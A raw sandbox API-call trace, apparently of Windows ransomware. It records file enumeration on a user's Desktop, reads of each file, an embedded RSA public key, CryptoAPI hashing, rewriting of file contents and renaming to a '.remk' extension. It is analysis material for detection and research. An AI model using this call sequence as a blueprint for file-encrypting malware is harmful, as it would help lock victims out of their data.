0x325f798 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3a0 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee430 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee400 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3e8 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee448 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee3e8 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee400 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37b5b70 [0233.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee418 | out: hHeap=0x630000) returned 1 [0233.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee448 | out: hHeap=0x630000) returned 1 [0233.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5d80 [0233.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0233.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5f98 [0233.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0233.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d80 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5f98 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee430 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3a0 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee388 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb738 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0233.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0233.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.223] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x12d2f, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x12d2f, lpOverlapped=0x0) returned 1 [0233.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0233.224] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12d34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.224] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0233.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.224] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.225] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.225] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.225] CloseHandle (hObject=0x640) returned 1 [0233.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0233.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.231] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\K151dM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\k151dm.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\K151dM.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\k151dm.swf.remk")) returned 1 [0233.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.231] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.233] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bda190, ftCreationTime.dwHighDateTime=0x1d5dcd3, ftLastAccessTime.dwLowDateTime=0xa1293010, ftLastAccessTime.dwHighDateTime=0x1d5de62, ftLastWriteTime.dwLowDateTime=0xa1293010, ftLastWriteTime.dwHighDateTime=0x1d5de62, nFileSizeHigh=0x0, nFileSizeLow=0x11c57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WOO6cFBQofqEBI.m4a", cAlternateFileName="WOO6CF~1.M4A")) returned 1 [0233.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba510 [0233.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0233.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\WOO6cFBQofqEBI.m4a") returned=".m4a" [0233.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\WOO6cFBQofqEBI.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\woo6cfbqofqebi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.234] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=72791) returned 1 [0233.234] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.237] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11c31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.237] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.239] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.239] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11c57, lpOverlapped=0x0) returned 1 [0233.240] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.240] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.240] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.240] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.241] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.241] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.241] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.242] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.242] GetLastError () returned 0x0 [0233.242] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.242] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.242] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.242] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.242] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11c60) returned 0x37c2278 [0233.243] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb738 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee388 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb780 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3a0 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee430 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3e8 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.243] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee430 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee430 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee3e8 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee3d0 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee430 | out: hHeap=0x630000) returned 1 [0233.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0233.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.245] GetCurrentThreadId () returned 0x314 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9c50 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.245] GetCurrentThreadId () returned 0x314 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee430 [0233.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: 